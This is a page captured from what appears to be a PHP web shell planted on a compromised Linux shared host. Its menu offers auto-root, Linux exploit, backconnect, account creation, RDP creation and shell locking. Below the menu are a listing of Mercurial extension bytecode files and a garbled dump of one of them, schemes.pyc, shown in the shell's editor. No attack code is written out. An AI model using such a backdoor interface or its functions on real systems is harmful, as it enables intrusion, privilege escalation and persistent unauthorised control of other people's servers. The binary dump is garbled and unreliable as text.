Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
hgext /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
257
B
-rw-r--r--
absorb.cpython-310.pyc
33.47
KB
-rw-r--r--
acl.cpython-310.pyc
11.77
KB
-rw-r--r--
amend.cpython-310.pyc
1.85
KB
-rw-r--r--
automv.cpython-310.pyc
3.07
KB
-rw-r--r--
beautifygraph.cpython-310.pyc
2.39
KB
-rw-r--r--
blackbox.cpython-310.pyc
5.19
KB
-rw-r--r--
bookflow.cpython-310.pyc
3.49
KB
-rw-r--r--
bugzilla.cpython-310.pyc
36.29
KB
-rw-r--r--
censor.cpython-310.pyc
3.7
KB
-rw-r--r--
children.cpython-310.pyc
1.94
KB
-rw-r--r--
churn.cpython-310.pyc
7.14
KB
-rw-r--r--
clonebundles.cpython-310.pyc
10.5
KB
-rw-r--r--
closehead.cpython-310.pyc
2.44
KB
-rw-r--r--
commitextras.cpython-310.pyc
2.13
KB
-rw-r--r--
eol.cpython-310.pyc
12.69
KB
-rw-r--r--
extdiff.cpython-310.pyc
16.42
KB
-rw-r--r--
factotum.cpython-310.pyc
3.9
KB
-rw-r--r--
fastexport.cpython-310.pyc
5.43
KB
-rw-r--r--
fetch.cpython-310.pyc
4.67
KB
-rw-r--r--
fix.cpython-310.pyc
28.83
KB
-rw-r--r--
githelp.cpython-310.pyc
24.92
KB
-rw-r--r--
gpg.cpython-310.pyc
9.28
KB
-rw-r--r--
graphlog.cpython-310.pyc
2.45
KB
-rw-r--r--
hgk.cpython-310.pyc
8.49
KB
-rw-r--r--
histedit.cpython-310.pyc
71.05
KB
-rw-r--r--
journal.cpython-310.pyc
16.34
KB
-rw-r--r--
keyword.cpython-310.pyc
25.98
KB
-rw-r--r--
logtoprocess.cpython-310.pyc
2.71
KB
-rw-r--r--
mq.cpython-310.pyc
102.34
KB
-rw-r--r--
notify.cpython-310.pyc
15.32
KB
-rw-r--r--
pager.cpython-310.pyc
1.66
KB
-rw-r--r--
patchbomb.cpython-310.pyc
25.23
KB
-rw-r--r--
phabricator.cpython-310.pyc
58.13
KB
-rw-r--r--
purge.cpython-310.pyc
498
B
-rw-r--r--
rebase.cpython-310.pyc
52.95
KB
-rw-r--r--
record.cpython-310.pyc
4.49
KB
-rw-r--r--
releasenotes.cpython-310.pyc
17.59
KB
-rw-r--r--
relink.cpython-310.pyc
5.29
KB
-rw-r--r--
remotenames.cpython-310.pyc
12.31
KB
-rw-r--r--
schemes.cpython-310.pyc
4.36
KB
-rw-r--r--
share.cpython-310.pyc
6.68
KB
-rw-r--r--
show.cpython-310.pyc
10.65
KB
-rw-r--r--
sparse.cpython-310.pyc
12.23
KB
-rw-r--r--
split.cpython-310.pyc
4.63
KB
-rw-r--r--
sqlitestore.cpython-310.pyc
26.77
KB
-rw-r--r--
strip.cpython-310.pyc
700
B
-rw-r--r--
transplant.cpython-310.pyc
22.64
KB
-rw-r--r--
uncommit.cpython-310.pyc
7.64
KB
-rw-r--r--
win32mbcs.cpython-310.pyc
5.34
KB
-rw-r--r--
win32text.cpython-310.pyc
5.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : schemes.cpython-310.pyc
o �]Lb\ � @ s� d Z ddlmZ ddlZddlZddlmZ ddlmZm Z m Z mZmZm Z ddlmZ i Ze�e�ZdZe�d�ZG d d � d e�Zdd� Zd ddddd�Zdd� Zeddd�dd� �ZdS )a' extend schemes with shortcuts to repository swarms This extension allows you to specify shortcuts for parent URLs with a lot of repositories to act like a scheme, for example:: [schemes] py = http://code.python.org/hg/ After that you can use it like:: hg clone py://trunk/ Additionally there is support for some more complex schemas, for example used by Google Code:: [schemes] gcode = http://{1}.googlecode.com/hg/ The syntax is taken from Mercurial templates, and you have unlimited number of variables, starting with ``{1}`` and continuing with ``{2}``, ``{3}`` and so on. This variables will receive parts of URL supplied, split by ``/``. Anything not specified as ``{part}`` will be just appended to an URL. For convenience, the extension adds these schemes by default:: [schemes] py = http://hg.python.org/ bb = https://bitbucket.org/ bb+ssh = ssh://hg@bitbucket.org/ gcode = https://{1}.googlecode.com/hg/ kiln = https://{1}.kilnhg.com/Repo/ You can override a predefined scheme by defining a new scheme with the same name. � )�absolute_importN)�_)�error� extensions�hg�pycompat� registrar� templater)�urlutils ships-with-hg-cores {(\d+)\}c @ s. e Zd Zdd� Zdd� Zd dd�Zdd � ZdS )�ShortRepositoryc C sL || _ || _|| _ztttt�| j���| _W d S t y% d| _Y d S w )Nr ) �schemer �url�max�map�int�_partre�findall�parts� ValueError)�selfr r r � r �//usr/lib/python3/dist-packages/hgext/schemes.py�__init__H s �zShortRepository.__init__c C s d| j S )Ns <ShortRepository: %s>)r )r r r r �__repr__Q s zShortRepository.__repr__Nc C s$ | � |�}t�|�j|||||d�S )N)�intents� createopts)�resolver �_peerlookup�instance)r �uir �creater r r r r r T s �zShortRepository.instancec C s� z |� dd�d }W n ty t�td�| ��w |� d| j�}t|�| jkr4|d }|d d� }nd}dd� t|�D �}d�| j � | j|��| S ) Ns ://� s no '://' in scheme url '%s'� /���� c S s i | ]\}}d |d |�qS )s %dr! r )�.0�i�vr r r � <dictcomp>f s z+ShortRepository.resolve.<locals>.<dictcomp>)�split� IndexErrorr �Abortr r �len� enumerate�joinr �processr )r r r �tail�contextr r r r Z s �zShortRepository.resolve)NN)�__name__� __module__�__qualname__r r r r r r r r r G s r c C s* |rt D ]}|�|d �r dS q| |�S )N� :F)�schemes� startswith)�orig�pathr r r r �hasdriveletterj s �r: s http://hg.python.org/s https://bitbucket.org/s ssh://hg@bitbucket.org/s https://{1}.googlecode.com/hg/s https://{1}.kilnhg.com/Repo/)s pys bbs bb+sshs gcodes kilnc C s� t �t| �d��� t�tj�}t �� D ]/\}}tj r:t |�dkr:|�� r:tj �d| �r:t�td�||�� f ��t|||�tj |<